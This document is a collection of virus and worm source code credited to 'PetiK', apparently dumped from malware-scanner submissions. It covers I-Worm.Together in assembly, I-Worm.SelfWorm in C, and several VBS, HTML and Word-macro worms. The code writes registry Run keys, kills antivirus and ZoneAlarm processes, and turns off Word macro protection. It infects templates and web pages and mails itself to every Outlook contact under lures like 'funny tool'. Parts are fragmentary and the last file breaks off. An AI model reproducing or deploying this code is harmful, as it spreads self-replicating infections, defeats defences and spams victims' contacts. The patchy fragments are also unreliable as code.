File Litelo.exe received on 05.16.2009 17:51:36 (CET)
Additional information
File size: 28672 bytes
MD5...: 4292a1ade77cb9e51e3de52101c99dcb
SHA1..: b485fdd64fda5d12221f83be8c062588f051b2c6
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
include Useful.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 50
push offset verif_worm
api GetSystemDirectoryA
@pushsz "\EBASE64.EXE"
push offset verif_worm
api lstrcat
push 0
push edi
push esi
api CopyFileA ; copy file
push 20
push edi
push 1
@pushsz "Encode Base64"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
jmp end_worm
continue_worm:
fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus
push 0
push 2
api CreateToolhelp32Snapshot
inc eax
jz end_fuck_antivirus
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile
lea ebx,[uProcess.szExeFile]
@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess
push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd
push 0
push offset new_name
push ebx
api CopyFileA
push ebx
api DeleteFileA
NextFile:
push offset uProcess
push lSnapshot
api Process32Next
jmp checkfile
InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:
call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset copy_worm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
Spread_Worm Proc
pushad
push 50
push offset vbs_worm
api GetSystemDirectoryA
@pushsz "\eBase.vbs"
push offset vbs_worm
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbs_worm
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
push offset vbs_worm
@pushsz "open"
push 0
api ShellExecuteA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset t_ini
api GetSystemDirectoryA
@pushsz "\together.ini"
push offset t_ini
api lstrcat
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
; === Copy Worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
verif_worm db 50 dup (0)
sysTime db 16 dup(0)
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
end start_worm
end
File Together.exe received on 05.16.2009 19:41:01 (CET)
Additional information
File size: 5120 bytes
MD5...: 91703278352e9e18d01d081c73330ec2
SHA1..: 81366149cda1578b5dc71b4c4860f9555467e1a4
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Start : April 1st 2002
Name : I-Worm.SelfWorm
Coder : PetiK
Language : C
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#include <tlhelp32.h>
#include <winver.h>
#include "SelfWorm.h"
char filename[100],cpywrm[100],copy2[100],start[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
LPTSTR cmdLine,ptr;
BOOL installed,rProcessFound;
HANDLE fd,lSnapshot,myproc;
BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup);
DWORD type=REG_SZ;
FILE *vbsworm;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup);
RegCloseKey(hReg);
GetModuleFileName(hInstance,filename,100);
GetSystemDirectory((char *)cpywrm,100);
strcat(cpywrm,"\\ShellW32.exe");
CopyFile(filename,cpywrm,0);
strcpy(copy2,cpywrm);
strcat(copy2," -i");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100);
RegCloseKey(hReg);
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
}
}
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer");
if(!installed) {
if(!RegisterWin95(&wc))
return FALSE;
hInst = hInstance;
hWnd = CreateWindow (lpszAppName,
lpszTitle,
WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX,
150,150,300,200,NULL,NULL,hInstance,NULL);
if(!hWnd)
return FALSE;
; ShowWindow(hWnd, nCmdShow);
ShowWindow(hWnd,SW_SHOWNORMAL);
UpdateWindow(hWnd);
while(GetMessage(&msg, NULL, 0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return(msg.wParam);
}
else
{
MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION);
FreeLibrary(hMAPI);
}
}
BOOL RegisterWin95(CONST WNDCLASS* lpwc)
{
WNDCLASSEX wcex;
wcex.style = lpwc->style;
wcex.lpfnWndProc = lpwc->lpfnWndProc;
wcex.cbClsExtra = lpwc->cbClsExtra;
wcex.cbWndExtra = lpwc->cbWndExtra;
wcex.hInstance = lpwc->hInstance;
wcex.hIcon = lpwc->hIcon;
wcex.hCursor = lpwc->hCursor;
wcex.hbrBackground = lpwc->hbrBackground;
wcex.lpszMenuName = lpwc->lpszMenuName;
wcex.lpszClassName = lpwc->lpszClassName;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW");
return RegisterClassEx(&wcex);
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static HWND hEdit = NULL;
switch(uMsg)
{
case WM_INITDIALOG:
hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE |
BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL );
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case IDM_ABOUT:
MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm",
MB_OK|MB_ICONINFORMATION);
break;
case IDM_MIRC:
mirc("C:\\mirc\\script.ini");
mirc("C:\\mirc32\\script.ini");
mirc("C:\\Program Files\\mirc\\script.ini");
mirc("C:\\Program Files\\mirc32\\script.ini");
mirc("C:\\progra~1\\mirc\\script.ini");
mirc("C:\\progra~1\\mirc32\\script.ini");
break;
case IDM_STOPAV:
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
break;
case IDM_STARTUP:
strcpy(start,startup);
strcat(start,"\\Shell32.exe");
CopyFile(filename,"C:\\hello.exe",0);
break;
case IDM_VBSSPREAD:
vbsworm=fopen("C:\\selfworm.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application
%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this.
%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool.
%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(3000);
DeleteFile("C:\\selfworm.vbs");
break;
case IDM_READMAIL:
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: NEW MAIL.";
mes->lpszNoteText="Here you have a new mail with a funny tool. No
danger.\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny_tool.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}
while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
}
break;
case IDM_EXIT :
FreeLibrary(hMAPI);
DestroyWindow(hWnd);
break;
}
break;
case WM_DESTROY :
PostQuitMessage(0);
break;
default:
return (DefWindowProc(hWnd, uMsg, wParam, lParam));
}
return(0L);
}
Additional information
File size: 29696 bytes
MD5...: e1a99c8d213bd20c976cabc1afb709f3
SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : VBS.Xchange.A
' Author : PetiK
' Language : VBS
' Date : 27/04/2002
Set win=fso.GetSpecialFolder(0)
fcopy=win&"\MSXchange.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
ws.RegWrite reg&"\MsExchange",fcopy
set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
sp.WriteLine "Attribute VB_Name = ""Xchange"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-
Worm.Xchange"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
sp.WriteLine "df = ""C:\XChange.vba"""
sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " doc(""Xchange"").Export df"
sp.WriteLine " nor.Import df"
sp.WriteLine "End If"
sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " nor(""Xchange"").Export df"
sp.WriteLine " doc.Import df"
sp.WriteLine " ActiveDocument.Save"
sp.WriteLine "End If"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
infvbs(win)
infvbs(fso.GetSpecialFolder(1))
SendWithOutlook()
Set wd=CreateObject("Word.Application")
Set vba=wd.NormalTemplate.VBProject.VBComponents
If vba.Item("Xchange").Name <> "Xchange" Then
vba.Import "C:\XChange.vba"
wd.Application.NormalTemplate.Save
End If
wd.Application.NormalTemplate.Close
wd.Application.Quit
Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit
Sub lect()
On Error Resume Next
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
End If
Next
End Sub
Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
verif=True
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Upgrade Ms Exchange"
mailmelto.Body "Run this attached file to upgrade Ms Exchange"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
Sub SendWithOutlook()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Update and upgrade MS Exchange."
F.Body="run this attached file to update Ms Exchange. See you soon."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(fcopy)
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
Function infvbs(Folder)
If f.FolderExists(Folder) then
End If
Next
End If
End Function
File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET)
Additional information
File size: 5770 bytes
MD5...: de34d735d30bd0e107e14bb6aa8bf3e0
SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46
' Name : VBS.Xchange.B aka RasLFront (because of French Presidential election on 2002)
' Author : PetiK
' Language : VBS
' Date : 05/05/2002
Set win=fso.GetSpecialFolder(0)
fcopy=win&"\XchgFix.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
'fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
'ws.RegWrite reg&"\MsExchangeFix",fcopy
set sp=fso.CreateTextFile("C:\rlf.sys",True,8)
sp.WriteLine "Private Sub Document_Open()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
Set wrd=CreateObject("Word.Application")
wrd.Options.virusprotection=0
wrd.Options.savenormalprompt=0
wrd.Options.confirmconversion=0
If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then
wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys")
wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront"
MsgBox "Pas Encore"
End If
wrd.Application.Quit
WScript.Quit
<welcome>
<html><head><title>Welcome</title>
<body onLoad="window.status='Welcome to my last creation'">
<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else
vbsn=""
For vbsname=1 To 8
randomize(timer)
vbsn=vbsn & chr(int(rnd(1)*26)+65)
Next
vbsn=vbsn&".vbs"
htms=document.body.createTextRange.htmltext
Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True)
vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
vbsf.Write "htm="""
vbsf.Write """"
vbsf.WriteLine ""
vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)"
vbsf.WriteLine "newhtm.WriteLine ""<welcome>"""
vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>"""
vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last
creation'"""">"""
vbsf.WriteLine "read="""""
vbsf.WriteLine "For pos=1 To Len(htm) Step 2"
vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& "
Mid(htm,pos,2))"
vbsf.WriteLine "Next"
vbsf.WriteLine "newhtm.Write read"
vbsf.WriteLine "newhtm.WriteLine ""</body></html>"""
vbsf.WriteLine "newhtm.Close"
vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm"""
vbsf.Close
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For Each adr In map.AddressLists
If adr.AddressEntries <> 0 Then
For addr=1 To adr.Addressentries.Count
Set nadr=adr.AddressEntries(addr)
Set mel=out.CreateItem(0)
mel.To=nadr.Address
mel.Subject="A Gift from your best friend"
mel.Body="This is for you (" &left(vbsn,8)& ")."
mel.Attachments.Add("C:\"&vbsn)
mel.Send
Next
End If
Next
infect(win)
infect(sys)
infect(fso.GetSpecialFolder(1))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
infect(ws.SpecialFolders("Favorites"))
infect(ws.SpecialFolders("Recent"))
If Day(Now())=7 Then
document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last
creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>"
Else
document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have
a nice day.<br></font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<welcome>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<welcome>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script>
</body></html>
YVQAVQXD.vbs
Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
htm="0D0A3C534352495054206C61...6E67756167543E"
Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2)
newhtm.WriteLine "<welcome>"
newhtm.WriteLine "<html><head><title>Welcome</title>"
newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">"
read=""
For pos=1 To Len(htm) Step 2
read=read & Chr("&h"& Mid(htm,pos,2))
Next
newhtm.Write read
newhtm.WriteLine "</body></html>"
newhtm.Close
ws.Run "C:\Welcome2U.htm"
File Welcome.htm received on 05.16.2009 19:58:08 (CET)
Additional information
File size: 3349 bytes
MD5...: 8b66aadcff8510521ba7f0bacb6fc54a
SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc
' Name : W97M.AutoSpread
' Author : PetiK
' Language : VBA Word
' Date : 09/05/2002
Sub AutoOpen()
nam = ActiveDocument.Name
vnam = Left(nam, Len(nam) - 4)
Call FuckProtection
Call InfectWord
Call Spread
If Day(Now) = 8 Then
MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A"
End If
End Sub
Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcmod = "C:\kitep.drv"
If nor.Item("AutoSpread").Name <> "AutoSpread" Then
doc("AutoSpread").Export srcmod
nor.Import srcmod
End If
If doc.Item("AutoSpread").Name <> "AutoSpread" Then
nor("AutoSpread").Export srcmod
doc.Import srcmod
ActiveDocument.Save
End If
Kill (srcmod)
End Sub
Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub Spread()
On Error Resume Next
subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4)
att = ActiveDocument.FullName
win = Environ("windir")
FileSystem.MkDir win + "\AutoSpread"
x = 0
nfile = ""
Do While x < 8
Randomize (Timer)
nfile = nfile + Chr(Int(Rnd(1) * 8) + 48)
x = x + 1
Loop
reg = nfile
nfile = nfile + ".vbs"
nfile = win + "\AutoSpread\" + nfile
Open nfile For Output As #1
Print #1, "'From W97M.AutoSpread"
Print #1, "On Error Resume Next"
Print #1, "Set out=CreateObject(""Outlook.Application"")"
Print #1, "Set map=out.GetNameSpace(""MAPI"")"
Print #1, "For Each C in map.AddressLists"
Print #1, "If C.AddressEntries.Count <> 0 Then"
Print #1, "For D=1 To C.AddressEntries.Count"
Print #1, "Set E=C.AddressEntries(D)"
Print #1, "Set env=out.CreateItem(0)"
Print #1, "env.To=E.Address"
Print #1, "env.Subject=""" + subj + """"
Print #1, "env.Body=""This confidential document is for you."""
Print #1, "env.Attachments.Add(""" + att + """)"
Print #1, "env.DeleteAfterSubmit=True"
